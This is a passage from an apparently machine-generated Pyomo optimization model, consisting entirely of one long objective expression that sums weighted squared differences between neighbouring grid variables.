m.x79)**2 + (1.3*m.x80 - 1.3*m.x79)**2) + 3.93334154633735*((8.11690209768664*m.x107 -
8.11690209768664*m.x80)**2 + (1.3*m.x81 - 1.3*m.x80)**2) + 3.88318350957206*((8.11690209768664*
m.x109 - 8.11690209768664*m.x82)**2 + (1.3*m.x83 - 1.3*m.x82)**2) + 3.88318350957206*((
8.11690209768664*m.x110 - 8.11690209768664*m.x83)**2 + (1.3*m.x84 - 1.3*m.x83)**2) +
3.88318350957206*((8.11690209768664*m.x111 - 8.11690209768664*m.x84)**2 + (1.3*m.x85 - 1.3*m.x84)
**2) + 3.88318350957206*((8.11690209768664*m.x112 - 8.11690209768664*m.x85)**2 + (1.3*m.x86 - 1.3
*m.x85)**2) + 3.88318350957206*((8.11690209768664*m.x113 - 8.11690209768664*m.x86)**2 + (1.3*
m.x87 - 1.3*m.x86)**2) + 3.88318350957206*((8.11690209768664*m.x114 - 8.11690209768664*m.x87)**2
+ (1.3*m.x88 - 1.3*m.x87)**2) + 3.88318350957206*((8.11690209768664*m.x115 - 8.11690209768664*
m.x88)**2 + (1.3*m.x89 - 1.3*m.x88)**2) + 3.88318350957206*((8.11690209768664*m.x116 -
8.11690209768664*m.x89)**2 + (1.3*m.x90 - 1.3*m.x89)**2) + 3.88318350957206*((8.11690209768664*
m.x117 - 8.11690209768664*m.x90)**2 + (1.3*m.x91 - 1.3*m.x90)**2) + 3.88318350957206*((
8.11690209768664*m.x118 - 8.11690209768664*m.x91)**2 + (1.3*m.x92 - 1.3*m.x91)**2) +
3.88318350957206*((8.11690209768664*m.x119 - 8.11690209768664*m.x92)**2 + (1.3*m.x93 - 1.3*m.x92)
**2) + 3.88318350957206*((8.11690209768664*m.x120 - 8.11690209768664*m.x93)**2 + (1.3*m.x94 - 1.3
*m.x93)**2) + 3.88318350957206*((8.11690209768664*m.x121 - 8.11690209768664*m.x94)**2 + (1.3*
m.x95 - 1.3*m.x94)**2) + 3.88318350957206*((8.11690209768664*m.x122 - 8.11690209768664*m.x95)**2
+ (1.3*m.x96 - 1.3*m.x95)**2) + 3.88318350957206*((8.11690209768664*m.x123 - 8.11690209768664*
m.x96)**2 + (1.3*m.x97 - 1.3*m.x96)**2) + 3.88318350957206*((8.11690209768664*m.x124 -
8.11690209768664*m.x97)**2 + (1.3*m.x98 - 1.3*m.x97)**2) + 3.88318350957206*((8.11690209768664*
m.x125 - 8.11690209768664*m.x98)**2 + (1.3*m.x99 - 1.3*m.x98)**2) + 3.88318350957206*((
8.11690209768664*m.x126 - 8.11690209768664*m.x99)**2 + (1.3*m.x100 - 1.3*m.x99)**2) +
3.88318350957206*((8.11690209768664*m.x127 - 8.11690209768664*m.x100)**2 + (1.3*m.x101 - 1.3*
m.x100)**2) + 3.88318350957206*((8.11690209768664*m.x128 - 8.11690209768664*m.x101)**2 + (1.3*
m.x102 - 1.3*m.x101)**2) + 3.88318350957206*((8.11690209768664*m.x129 - 8.11690209768664*m.x102)
**2 + (1.3*m.x103 - 1.3*m.x102)**2) + 3.88318350957206*((8.11690209768664*m.x130 -
8.11690209768664*m.x103)**2 + (1.3*m.x104 - 1.3*m.x103)**2) + 3.88318350957206*((8.11690209768664
*m.x131 - 8.11690209768664*m.x104)**2 + (1.3*m.x105 - 1.3*m.x104)**2) + 3.88318350957206*((
8.11690209768664*m.x132 - 8.11690209768664*m.x105)**2 + (1.3*m.x106 - 1.3*m.x105)**2) +
3.88318350957206*((8.11690209768664*m.x133 - 8.11690209768664*m.x106)**2 + (1.3*m.x107 - 1.3*
m.x106)**2) + 3.88318350957206*((8.11690209768664*m.x134 - 8.11690209768664*m.x107)**2 + (1.3*
m.x108 - 1.3*m.x107)**2) + 3.81904921438734*((8.11690209768664*m.x136 - 8.11690209768664*m.x109)
**2 + (1.3*m.x110 - 1.3*m.x109)**2) + 3.81904921438734*((8.11690209768664*m.x137 -
8.11690209768664*m.x110)**2 + (1.3*m.x111 - 1.3*m.x110)**2) + 3.81904921438734*((8.11690209768664
*m.x138 - 8.11690209768664*m.x111)**2 + (1.3*m.x112 - 1.3*m.x111)**2) + 3.81904921438734*((
8.11690209768664*m.x139 - 8.11690209768664*m.x112)**2 + (1.3*m.x113 - 1.3*m.x112)**2) +
3.81904921438734*((8.11690209768664*m.x140 - 8.11690209768664*m.x113)**2 + (1.3*m.x114 - 1.3*
m.x113)**2) + 3.81904921438734*((8.11690209768664*m.x141 - 8.11690209768664*m.x114)**2 + (1.3*
m.x115 - 1.3*m.x114)**2) + 3.81904921438734*((8.11690209768664*m.x142 - 8.11690209768664*m.x115)
**2 + (1.3*m.x116 - 1.3*m.x115)**2) + 3.81904921438734*((8.11690209768664*m.x143 -
8.11690209768664*m.x116)**2 + (1.3*m.x117 - 1.3*m.x116)**2) + 3.81904921438734*((8.11690209768664
*m.x144 - 8.11690209768664*m.x117)**2 + (1.3*m.x118 - 1.3*m.x117)**2) + 3.81904921438734*((
8.11690209768664*m.x145 - 8.11690209768664*m.x118)**2 + (1.3*m.x119 - 1.3*m.x118)**2) +
3.81904921438734*((8.11690209768664*m.x146 - 8.11690209768664*m.x119)**2 + (1.3*m.x120 - 1.3*
m.x119)**2) + 3.81904921438734*((8.11690209768664*m.x147 - 8.11690209768664*m.x120)**2 + (1.3*
m.x121 - 1.3*m.x120)**2) + 3.81904921438734*((8.11690209768664*m.x148 - 8.11690209768664*m.x121)
**2 + (1.3*m.x122 - 1.3*m.x121)**2) + 3.81904921438734*((8.11690209768664*m.x149 -
8.11690209768664*m.x122)**2 + (1.3*m.x123 - 1.3*m.x122)**2) + 3.81904921438734*((8.11690209768664
*m.x150 - 8.11690209768664*m.x123)**2 + (1.3*m.x124 - 1.3*m.x123)**2) + 3.81904921438734*((
8.11690209768664*m.x151 - 8.11690209768664*m.x124)**2 + (1.3*m.x125 - 1.3*m.x124)**2) +
3.81904921438734*((8.11690209768664*m.x152 - 8.11690209768664*m.x125)**2 + (1.3*m.x126 - 1.3*
m.x125)**2) + 3.81904921438734*((8.11690209768664*m.x153 - 8.11690209768664*m.x126)**2 + (1.3*
m.x127 - 1.3*m.x126)**2) + 3.81904921438734*((8.11690209768664*m.x154 - 8.11690209768664*m.x127)
**2 + (1.3*m.x128 - 1.3*m.x127)**2) + 3.81904921438734*((8.11690209768664*m.x155 -
8.11690209768664*m.x128)**2 + (1.3*m.x129 - 1.3*m.x128)**2) + 3.81904921438734*((8.11690209768664
*m.x156 - 8.11690209768664*m.x129)**2 + (1.3*m.x130 - 1.3*m.x129)**2) + 3.81904921438734*((
8.11690209768664*m.x157 - 8.11690209768664*m.x130)**2 + (1.3*m.x131 - 1.3*m.x130)**2) +
3.81904921438734*((8.11690209768664*m.x158 - 8.11690209768664*m.x131)**2 + (1.3*m.x132 - 1.3*
m.x131)**2) + 3.81904921438734*((8.11690209768664*m.x159 - 8.11690209768664*m.x132)**2 + (1.3*
m.x133 - 1.3*m.x132)**2) + 3.81904921438734*((8.11690209768664*m.x160 - 8.11690209768664*m.x133)
**2 + (1.3*m.x134 - 1.3*m.x133)**2) + 3.81904921438734*((8.11690209768664*m.x161 -
8.11690209768664*m.x134)**2 + (1.3*m.x135 - 1.3*m.x134)**2) + 3.74236872480975*((8.11690209768664
*m.x163 - 8.11690209768664*m.x136)**2 + (1.3*m.x137 - 1.3*m.x136)**2) + 3.74236872480975*((
8.11690209768664*m.x164 - 8.11690209768664*m.x137)**2 + (1.3*m.x138 - 1.3*m.x137)**2) +
3.74236872480975*((8.11690209768664*m.x165 - 8.11690209768664*m.x138)**2 + (1.3*m.x139 - 1.3*
m.x138)**2) + 3.74236872480975*((8.11690209768664*m.x166 - 8.11690209768664*m.x139)**2 + (1.3*
m.x140 - 1.3*m.x139)**2) + 3.74236872480975*((8.11690209768664*m.x167 - 8.11690209768664*m.x140)
**2 + (1.3*m.x141 - 1.3*m.x140)**2) + 3.74236872480975*((8.11690209768664*m.x168 -
8.11690209768664*m.x141)**2 + (1.3*m.x142 - 1.3*m.x141)**2) + 3.74236872480975*((8.11690209768664
*m.x169 - 8.11690209768664*m.x142)**2 + (1.3*m.x143 - 1.3*m.x142)**2) + 3.74236872480975*((
8.11690209768664*m.x170 - 8.11690209768664*m.x143)**2 + (1.3*m.x144 - 1.3*m.x143)**2) +
3.74236872480975*((8.11690209768664*m.x171 - 8.11690209768664*m.x144)**2 + (1.3*m.x145 - 1.3*
m.x144)**2) + 3.74236872480975*((8.11690209768664*m.x172 - 8.11690209768664*m.x145)**2 + (1.3*
m.x146 - 1.3*m.x145)**2) + 3.74236872480975*((8.11690209768664*m.x173 - 8.11690209768664*m.x146)
**2 + (1.3*m.x147 - 1.3*m.x146)**2) + 3.74236872480975*((8.11690209768664*m.x174 -
8.11690209768664*m.x147)**2 + (1.3*m.x148 - 1.3*m.x147)**2) + 3.74236872480975*((8.11690209768664
*m.x175 - 8.11690209768664*m.x148)**2 + (1.3*m.x149 - 1.3*m.x148)**2) + 3.74236872480975*((
8.11690209768664*m.x176 - 8.11690209768664*m.x149)**2 + (1.3*m.x150 - 1.3*m.x149)**2) +
3.74236872480975*((8.11690209768664*m.x177 - 8.11690209768664*m.x150)**2 + (1.3*m.x151 - 1.3*
m.x150)**2) + 3.74236872480975*((8.11690209768664*m.x178 - 8.11690209768664*m.x151)**2 + (1.3*
m.x152 - 1.3*m.x151)**2) + 3.74236872480975*((8.11690209768664*m.x179 - 8.11690209768664*m.x152)
**2 + (1.3*m.x153 - 1.3*m.x152)**2) + 3.74236872480975*((8.11690209768664*m.x180 -
8.11690209768664*m.x153)**2 + (1.3*m.x154 - 1.3*m.x153)**2) + 3.74236872480975*((8.11690209768664
*m.x181 - 8.11690209768664*m.x154)**2 + (1.3*m.x155 - 1.3*m.x154)**2) + 3.74236872480975*((
8.11690209768664*m.x182 - 8.11690209768664*m.x155)**2 + (1.3*m.x156 - 1.3*m.x155)**2) +
3.74236872480975*((8.11690209768664*m.x183 - 8.11690209768664*m.x156)**2 + (1.3*m.x157 - 1.3*
m.x156)**2) + 3.74236872480975*((8.11690209768664*m.x184 - 8.11690209768664*m.x157)**2 + (1.3*
m.x158 - 1.3*m.x157)**2) + 3.74236872480975*((8.11690209768664*m.x185 - 8.11690209768664*m.x158)
**2 + (1.3*m.x159 - 1.3*m.x158)**2) + 3.74236872480975*((8.11690209768664*m.x186 -
8.11690209768664*m.x159)**2 + (1.3*m.x160 - 1.3*m.x159)**2) + 3.74236872480975*((8.11690209768664
*m.x187 - 8.11690209768664*m.x160)**2 + (1.3*m.x161 - 1.3*m.x160)**2) + 3.74236872480975*((
8.11690209768664*m.x188 - 8.11690209768664*m.x161)**2 + (1.3*m.x162 - 1.3*m.x161)**2) +
3.65481034794559*((8.11690209768664*m.x190 - 8.11690209768664*m.x163)**2 + (1.3*m.x164 - 1.3*
m.x163)**2) + 3.65481034794559*((8.11690209768664*m.x191 - 8.11690209768664*m.x164)**2 + (1.3*
m.x165 - 1.3*m.x164)**2) + 3.65481034794559*((8.11690209768664*m.x192 - 8.11690209768664*m.x165)
**2 + (1.3*m.x166 - 1.3*m.x165)**2) + 3.65481034794559*((8.11690209768664*m.x193 -
8.11690209768664*m.x166)**2 + (1.3*m.x167 - 1.3*m.x166)**2) + 3.65481034794559*((8.11690209768664
*m.x194 - 8.11690209768664*m.x167)**2 + (1.3*m.x168 - 1.3*m.x167)**2) + 3.65481034794559*((
8.11690209768664*m.x195 - 8.11690209768664*m.x168)**2 + (1.3*m.x169 - 1.3*m.x168)**2) +
3.65481034794559*((8.11690209768664*m.x196 - 8.11690209768664*m.x169)**2 + (1.3*m.x170 - 1.3*
m.x169)**2) + 3.65481034794559*((8.11690209768664*m.x197 - 8.11690209768664*m.x170)**2 + (1.3*
m.x171 - 1.3*m.x170)**2) + 3.65481034794559*((8.11690209768664*m.x198 - 8.11690209768664*m.x171)
**2 + (1.3*m.x172 - 1.3*m.x171)**2) + 3.65481034794559*((8.11690209768664*m.x199 -
8.11690209768664*m.x172)**2 + (1.3*m.x173 - 1.3*m.x172)**2) + 3.65481034794559*((8.11690209768664
*m.x200 - 8.11690209768664*m.x173)**2 + (1.3*m.x174 - 1.3*m.x173)**2) + 3.65481034794559*((
8.11690209768664*m.x201 - 8.11690209768664*m.x174)**2 + (1.3*m.x175 - 1.3*m.x174)**2) +
3.65481034794559*((8.11690209768664*m.x202 - 8.11690209768664*m.x175)**2 + (1.3*m.x176 - 1.3*
m.x175)**2) + 3.65481034794559*((8.11690209768664*m.x203 - 8.11690209768664*m.x176)**2 + (1.3*
m.x177 - 1.3*m.x176)**2) + 3.65481034794559*((8.11690209768664*m.x204 - 8.11690209768664*m.x177)
**2 + (1.3*m.x178 - 1.3*m.x177)**2) + 3.65481034794559*((8.11690209768664*m.x205 -
8.11690209768664*m.x178)**2 + (1.3*m.x179 - 1.3*m.x178)**2) + 3.65481034794559*((8.11690209768664
*m.x206 - 8.11690209768664*m.x179)**2 + (1.3*m.x180 - 1.3*m.x179)**2) + 3.65481034794559*((
8.11690209768664*m.x207 - 8.11690209768664*m.x180)**2 + (1.3*m.x181 - 1.3*m.x180)**2) +
3.65481034794559*((8.11690209768664*m.x208 - 8.11690209768664*m.x181)**2 + (1.3*m.x182 - 1.3*
m.x181)**2) + 3.65481034794559*((8.11690209768664*m.x209 - 8.11690209768664*m.x182)**2 + (1.3*
m.x183 - 1.3*m.x182)**2) + 3.65481034794559*((8.11690209768664*m.x210 - 8.11690209768664*m.x183)
**2 + (1.3*m.x184 - 1.3*m.x183)**2) + 3.65481034794559*((8.11690209768664*m.x211 -
8.11690209768664*m.x184)**2 + (1.3*m.x185 - 1.3*m.x184)**2) + 3.65481034794559*((8.11690209768664
*m.x212 - 8.11690209768664*m.x185)**2 + (1.3*m.x186 - 1.3*m.x185)**2) + 3.65481034794559*((
8.11690209768664*m.x213 - 8.11690209768664*m.x186)**2 + (1.3*m.x187 - 1.3*m.x186)**2) +
3.65481034794559*((8.11690209768664*m.x214 - 8.11690209768664*m.x187)**2 + (1.3*m.x188 - 1.3*
m.x187)**2) + 3.65481034794559*((8.11690209768664*m.x215 - 8.11690209768664*m.x188)**2 + (1.3*
m.x189 - 1.3*m.x188)**2) + 3.55822249316643*((8.11690209768664*m.x217 - 8.11690209768664*m.x190)
**2 + (1.3*m.x191 - 1.3*m.x190)**2) + 3.55822249316643*((8.11690209768664*m.x218 -
8.11690209768664*m.x191)**2 + (1.3*m.x192 - 1.3*m.x191)**2) + 3.55822249316643*((8.11690209768664
*m.x219 - 8.11690209768664*m.x192)**2 + (1.3*m.x193 - 1.3*m.x192)**2) + 3.55822249316643*((
8.11690209768664*m.x220 - 8.11690209768664*m.x193)**2 + (1.3*m.x194 - 1.3*m.x193)**2) +
3.55822249316643*((8.11690209768664*m.x221 - 8.11690209768664*m.x194)**2 + (1.3*m.x195 - 1.3*
m.x194)**2) + 3.55822249316643*((8.11690209768664*m.x222 - 8.11690209768664*m.x195)**2 + (1.3*
m.x196 - 1.3*m.x195)**2) + 3.55822249316643*((8.11690209768664*m.x223 - 8.11690209768664*m.x196)
**2 + (1.3*m.x197 - 1.3*m.x196)**2) + 3.55822249316643*((8.11690209768664*m.x224 -
8.11690209768664*m.x197)**2 + (1.3*m.x198 - 1.3*m.x197)**2) + 3.55822249316643*((8.11690209768664
*m.x225 - 8.11690209768664*m.x198)**2 + (1.3*m.x199 - 1.3*m.x198)**2) + 3.55822249316643*((
8.11690209768664*m.x226 - 8.11690209768664*m.x199)**2 + (1.3*m.x200 - 1.3*m.x199)**2) +
3.55822249316643*((8.11690209768664*m.x227 - 8.11690209768664*m.x200)**2 + (1.3*m.x201 - 1.3*
m.x200)**2) + 3.55822249316643*((8.11690209768664*m.x228 - 8.11690209768664*m.x201)**2 + (1.3*
m.x202 - 1.3*m.x201)**2) + 3.55822249316643*((8.11690209768664*m.x229 - 8.11690209768664*m.x202)
**2 + (1.3*m.x203 - 1.3*m.x202)**2) + 3.55822249316643*((8.11690209768664*m.x230 -
8.11690209768664*m.x203)**2 + (1.3*m.x204 - 1.3*m.x203)**2) + 3.55822249316643*((8.11690209768664
*m.x231 - 8.11690209768664*m.x204)**2 + (1.3*m.x205 - 1.3*m.x204)**2) + 3.55822249316643*((
8.11690209768664*m.x232 - 8.11690209768664*m.x205)**2 + (1.3*m.x206 - 1.3*m.x205)**2) +
3.55822249316643*((8.11690209768664*m.x233 - 8.11690209768664*m.x206)**2 + (1.3*m.x207 - 1.3*
m.x206)**2) + 3.55822249316643*((8.11690209768664*m.x234 - 8.11690209768664*m.x207)**2 + (1.3*
m.x208 - 1.3*m.x207)**2) + 3.55822249316643*((8.11690209768664*m.x235 - 8.11690209768664*m.x208)
**2 + (1.3*m.x209 - 1.3*m.x208)**2) + 3.55822249316643*((8.11690209768664*m.x236 -
8.11690209768664*m.x209)**2 + (1.3*m.x210 - 1.3*m.x209)**2) + 3.55822249316643*((8.11690209768664
*m.x237 - 8.11690209768664*m.x210)**2 + (1.3*m.x211 - 1.3*m.x210)**2) + 3.55822249316643*((
8.11690209768664*m.x238 - 8.11690209768664*m.x211)**2 + (1.3*m.x212 - 1.3*m.x211)**2) +
3.55822249316643*((8.11690209768664*m.x239 - 8.11690209768664*m.x212)**2 + (1.3*m.x213 - 1.3*
m.x212)**2) + 3.55822249316643*((8.11690209768664*m.x240 - 8.11690209768664*m.x213)**2 + (1.3*
m.x214 - 1.3*m.x213)**2) + 3.55822249316643*((8.11690209768664*m.x241 - 8.11690209768664*m.x214)
**2 + (1.3*m.x215 - 1.3*m.x214)**2) + 3.55822249316643*((8.11690209768664*m.x242 -
8.11690209768664*m.x215)**2 + (1.3*m.x216 - 1.3*m.x215)**2) + 3.45457232960193*((8.11690209768664
*m.x244 - 8.11690209768664*m.x217)**2 + (1.3*m.x218 - 1.3*m.x217)**2) + 3.45457232960193*((
8.11690209768664*m.x245 - 8.11690209768664*m.x218)**2 + (1.3*m.x219 - 1.3*m.x218)**2) +
3.45457232960193*((8.11690209768664*m.x246 - 8.11690209768664*m.x219)**2 + (1.3*m.x220 - 1.3*
m.x219)**2) + 3.45457232960193*((8.11690209768664*m.x247 - 8.11690209768664*m.x220)**2 + (1.3*
m.x221 - 1.3*m.x220)**2) + 3.45457232960193*((8.11690209768664*m.x248 - 8.11690209768664*m.x221)
**2 + (1.3*m.x222 - 1.3*m.x221)**2) + 3.45457232960193*((8.11690209768664*m.x249 -
8.11690209768664*m.x222)**2 + (1.3*m.x223 - 1.3*m.x222)**2) + 3.45457232960193*((8.11690209768664
*m.x250 - 8.11690209768664*m.x223)**2 + (1.3*m.x224 - 1.3*m.x223)**2) + 3.45457232960193*((
8.11690209768664*m.x251 - 8.11690209768664*m.x224)**2 + (1.3*m.x225 - 1.3*m.x224)**2) +
3.45457232960193*((8.11690209768664*m.x252 - 8.11690209768664*m.x225)**2 + (1.3*m.x226 - 1.3*
m.x225)**2) + 3.45457232960193*((8.11690209768664*m.x253 - 8.11690209768664*m.x226)**2 + (1.3*
m.x227 - 1.3*m.x226)**2) + 3.45457232960193*((8.11690209768664*m.x254 - 8.11690209768664*m.x227)
**2 + (1.3*m.x228 - 1.3*m.x227)**2) + 3.45457232960193*((8.11690209768664*m.x255 -
8.11690209768664*m.x228)**2 + (1.3*m.x229 - 1.3*m.x228)**2) + 3.45457232960193*((8.11690209768664
*m.x256 - 8.11690209768664*m.x229)**2 + (1.3*m.x230 - 1.3*m.x229)**2) + 3.45457232960193*((
8.11690209768664*m.x257 - 8.11690209768664*m.x230)**2 + (1.3*m.x231 - 1.3*m.x230)**2) +
3.45457232960193*((8.11690209768664*m.x258 - 8.11690209768664*m.x231)**2 + (1.3*m.x232 - 1.3*
m.x231)**2) + 3.45457232960193*((8.11690209768664*m.x259 - 8.11690209768664*m.x232)**2 + (1.3*
m.x233 - 1.3*m.x232)**2) + 3.45457232960193*((8.11690209768664*m.x260 - 8.11690209768664*m.x233)
**2 + (1.3*m.x234 - 1.3*m.x233)**2) + 3.45457232960193*((8.11690209768664*m.x261 -
8.11690209768664*m.x234)**2 + (1.3*m.x235 - 1.3*m.x234)**2) + 3.45457232960193*((8.11690209768664
*m.x262 - 8.11690209768664*m.x235)**2 + (1.3*m.x236 - 1.3*m.x235)**2) + 3.45457232960193*((
8.11690209768664*m.x263 - 8.11690209768664*m.x236)**2 + (1.3*m.x237 - 1.3*m.x236)**2) +
3.45457232960193*((8.11690209768664*m.x264 - 8.11690209768664*m.x237)**2 + (1.3*m.x238 - 1.3*
m.x237)**2) + 3.45457232960193*((8.11690209768664*m.x265 - 8.11690209768664*m.x238)**2 + (1.3*
m.x239 - 1.3*m.x238)**2) + 3.45457232960193*((8.11690209768664*m.x266 - 8.11690209768664*m.x239)
**2 + (1.3*m.x240 - 1.3*m.x239)**2) + 3.45457232960193*((8.11690209768664*m.x267 -
8.11690209768664*m.x240)**2 + (1.3*m.x241 - 1.3*m.x240)**2) + 3.45457232960193*((8.11690209768664
*m.x268 - 8.11690209768664*m.x241)**2 + (1.3*m.x242 - 1.3*m.x241)**2) + 3.45457232960193*((
8.11690209768664*m.x269 - 8.11690209768664*m.x242)**2 + (1.3*m.x243 - 1.3*m.x242)**2) +
3.34588443376256*((8.11690209768664*m.x271 - 8.11690209768664*m.x244)**2 + (1.3*m.x245 - 1.3*
m.x244)**2) + 3.34588443376256*((8.11690209768664*m.x272 - 8.11690209768664*m.x245)**2 + (1.3*
m.x246 - 1.3*m.x245)**2) + 3.34588443376256*((8.11690209768664*m.x273 - 8.11690209768664*m.x246)
**2 + (1.3*m.x247 - 1.3*m.x246)**2) + 3.34588443376256*((8.11690209768664*m.x274 -
8.11690209768664*m.x247)**2 + (1.3*m.x248 - 1.3*m.x247)**2) + 3.34588443376256*((8.11690209768664
*m.x275 - 8.11690209768664*m.x248)**2 + (1.3*m.x249 - 1.3*m.x248)**2) + 3.34588443376256*((
8.11690209768664*m.x276 - 8.11690209768664*m.x249)**2 + (1.3*m.x250 - 1.3*m.x249)**2) +
3.34588443376256*((8.11690209768664*m.x277 - 8.11690209768664*m.x250)**2 + (1.3*m.x251 - 1.3*
m.x250)**2) + 3.34588443376256*((8.11690209768664*m.x278 - 8.11690209768664*m.x251)**2 + (1.3*
m.x252 - 1.3*m.x251)**2) + 3.34588443376256*((8.11690209768664*m.x279 - 8.11690209768664*m.x252)
**2 + (1.3*m.x253 - 1.3*m.x252)**2) + 3.34588443376256*((8.11690209768664*m.x280 -
8.11690209768664*m.x253)**2 + (1.3*m.x254 - 1.3*m.x253)**2) + 3.34588443376256*((8.11690209768664
*m.x281 - 8.11690209768664*m.x254)**2 + (1.3*m.x255 - 1.3*m.x254)**2) + 3.34588443376256*((
8.11690209768664*m.x282 - 8.11690209768664*m.x255)**2 + (1.3*m.x256 - 1.3*m.x255)**2) +
3.34588443376256*((8.11690209768664*m.x283 - 8.11690209768664*m.x256)**2 + (1.3*m.x257 - 1.3*
m.x256)**2) + 3.34588443376256*((8.11690209768664*m.x284 - 8.11690209768664*m.x257)**2 + (1.3*
m.x258 - 1.3*m.x257)**2) + 3.34588443376256*((8.11690209768664*m.x285 - 8.11690209768664*m.x258)
**2 + (1.3*m.x259 - 1.3*m.x258)**2) + 3.34588443376256*((8.11690209768664*m.x286 -
8.11690209768664*m.x259)**2 + (1.3*m.x260 - 1.3*m.x259)**2) + 3.34588443376256*((8.11690209768664
*m.x287 - 8.11690209768664*m.x260)**2 + (1.3*m.x261 - 1.3*m.x260)**2) + 3.34588443376256*((
8.11690209768664*m.x288 - 8.11690209768664*m.x261)**2 + (1.3*m.x262 - 1.3*m.x261)**2) +
3.34588443376256*((8.11690209768664*m.x289 - 8.11690209768664*m.x262)**2 + (1.3*m.x263 - 1.3*
m.x262)**2) + 3.34588443376256*((8.11690209768664*m.x290 - 8.11690209768664*m.x263)**2 + (1.3*
m.x264 - 1.3*m.x263)**2) + 3.34588443376256*((8.11690209768664*m.x291 - 8.11690209768664*m.x264)
**2 + (1.3*m.x265 - 1.3*m.x264)**2) + 3.34588443376256*((8.11690209768664*m.x292 -
8.11690209768664*m.x265)**2 + (1.3*m.x266 - 1.3*m.x265)**2) + 3.34588443376256*((8.11690209768664
*m.x293 - 8.11690209768664*m.x266)**2 + (1.3*m.x267 - 1.3*m.x266)**2) + 3.34588443376256*((
8.11690209768664*m.x294 - 8.11690209768664*m.x267)**2 + (1.3*m.x268 - 1.3*m.x267)**2) +
3.34588443376256*((8.11690209768664*m.x295 - 8.11690209768664*m.x268)**2 + (1.3*m.x269 - 1.3*
m.x268)**2) + 3.34588443376256*((8.11690209768664*m.x296 - 8.11690209768664*m.x269)**2 + (1.3*
m.x270 - 1.3*m.x269)**2) + 3.23418241711762*((8.11690209768664*m.x298 - 8.11690209768664*m.x271)
**2 + (1.3*m.x272 - 1.3*m.x271)**2) + 3.23418241711762*((8.11690209768664*m.x299 -
8.11690209768664*m.x272)**2 + (1.3*m.x273 - 1.3*m.x272)**2) + 3.23418241711762*((8.11690209768664
*m.x300 - 8.11690209768664*m.x273)**2 + (1.3*m.x274 - 1.3*m.x273)**2) + 3.23418241711762*((
8.11690209768664*m.x301 - 8.11690209768664*m.x274)**2 + (1.3*m.x275 - 1.3*m.x274)**2) +
3.23418241711762*((8.11690209768664*m.x302 - 8.11690209768664*m.x275)**2 + (1.3*m.x276 - 1.3*
m.x275)**2) + 3.23418241711762*((8.11690209768664*m.x303 - 8.11690209768664*m.x276)**2 + (1.3*
m.x277 - 1.3*m.x276)**2) + 3.23418241711762*((8.11690209768664*m.x304 - 8.11690209768664*m.x277)
**2 + (1.3*m.x278 - 1.3*m.x277)**2) + 3.23418241711762*((8.11690209768664*m.x305 -
8.11690209768664*m.x278)**2 + (1.3*m.x279 - 1.3*m.x278)**2) + 3.23418241711762*((8.11690209768664
*m.x306 - 8.11690209768664*m.x279)**2 + (1.3*m.x280 - 1.3*m.x279)**2) + 3.23418241711762*((
8.11690209768664*m.x307 - 8.11690209768664*m.x280)**2 + (1.3*m.x281 - 1.3*m.x280)**2) +
3.23418241711762*((8.11690209768664*m.x308 - 8.11690209768664*m.x281)**2 + (1.3*m.x282 - 1.3*
m.x281)**2) + 3.23418241711762*((8.11690209768664*m.x309 - 8.11690209768664*m.x282)**2 + (1.3*
m.x283 - 1.3*m.x282)**2) + 3.23418241711762*((8.11690209768664*m.x310 - 8.11690209768664*m.x283)
**2 + (1.3*m.x284 - 1.3*m.x283)**2) + 3.23418241711762*((8.11690209768664*m.x311 -
8.11690209768664*m.x284)**2 + (1.3*m.x285 - 1.3*m.x284)**2) + 3.23418241711762*((8.11690209768664
*m.x312 - 8.11690209768664*m.x285)**2 + (1.3*m.x286 - 1.3*m.x285)**2) + 3.23418241711762*((
8.11690209768664*m.x313 - 8.11690209768664*m.x286)**2 + (1.3*m.x287 - 1.3*m.x286)**2) +
3.23418241711762*((8.11690209768664*m.x314 - 8.11690209768664*m.x287)**2 + (1.3*m.x288 - 1.3*
m.x287)**2) + 3.23418241711762*((8.11690209768664*m.x315 - 8.11690209768664*m.x288)**2 + (1.3*
m.x289 - 1.3*m.x288)**2) + 3.23418241711762*((8.11690209768664*m.x316 - 8.11690209768664*m.x289)
**2 + (1.3*m.x290 - 1.3*m.x289)**2) + 3.23418241711762*((8.11690209768664*m.x317 -
8.11690209768664*m.x290)**2 + (1.3*m.x291 - 1.3*m.x290)**2) + 3.23418241711762*((8.11690209768664
*m.x318 - 8.11690209768664*m.x291)**2 + (1.3*m.x292 - 1.3*m.x291)**2) + 3.23418241711762*((
8.11690209768664*m.x319 - 8.11690209768664*m.x292)**2 + (1.3*m.x293 - 1.3*m.x292)**2) +
3.23418241711762*((8.11690209768664*m.x320 - 8.11690209768664*m.x293)**2 + (1.3*m.x294 - 1.3*
m.x293)**2) + 3.23418241711762*((8.11690209768664*m.x321 - 8.11690209768664*m.x294)**2 + (1.3*
m.x295 - 1.3*m.x294)**2) + 3.23418241711762*((8.11690209768664*m.x322 - 8.11690209768664*m.x295)
**2 + (1.3*m.x296 - 1.3*m.x295)**2) + 3.23418241711762*((8.11690209768664*m.x323 -
8.11690209768664*m.x296)**2 + (1.3*m.x297 - 1.3*m.x296)**2) + 3.12143613076959*((8.11690209768664
*m.x325 - 8.11690209768664*m.x298)**2 + (1.3*m.x299 - 1.3*m.x298)**2) + 3.12143613076959*((
8.11690209768664*m.x326 - 8.11690209768664*m.x299)**2 + (1.3*m.x300 - 1.3*m.x299)**2) +
3.12143613076959*((8.11690209768664*m.x327 - 8.11690209768664*m.x300)**2 + (1.3*m.x301 - 1.3*
m.x300)**2) + 3.12143613076959*((8.11690209768664*m.x328 - 8.11690209768664*m.x301)**2 + (1.3*
m.x302 - 1.3*m.x301)**2) + 3.12143613076959*((8.11690209768664*m.x329 - 8.11690209768664*m.x302)
**2 + (1.3*m.x303 - 1.3*m.x302)**2) + 3.12143613076959*((8.11690209768664*m.x330 -
8.11690209768664*m.x303)**2 + (1.3*m.x304 - 1.3*m.x303)**2) + 3.12143613076959*((8.11690209768664
*m.x331 - 8.11690209768664*m.x304)**2 + (1.3*m.x305 - 1.3*m.x304)**2) + 3.12143613076959*((
8.11690209768664*m.x332 - 8.11690209768664*m.x305)**2 + (1.3*m.x306 - 1.3*m.x305)**2) +
3.12143613076959*((8.11690209768664*m.x333 - 8.11690209768664*m.x306)**2 + (1.3*m.x307 - 1.3*
m.x306)**2) + 3.12143613076959*((8.11690209768664*m.x334 - 8.11690209768664*m.x307)**2 + (1.3*
m.x308 - 1.3*m.x307)**2) + 3.12143613076959*((8.11690209768664*m.x335 - 8.11690209768664*m.x308)
**2 + (1.3*m.x309 - 1.3*m.x308)**2) + 3.12143613076959*((8.11690209768664*m.x336 -
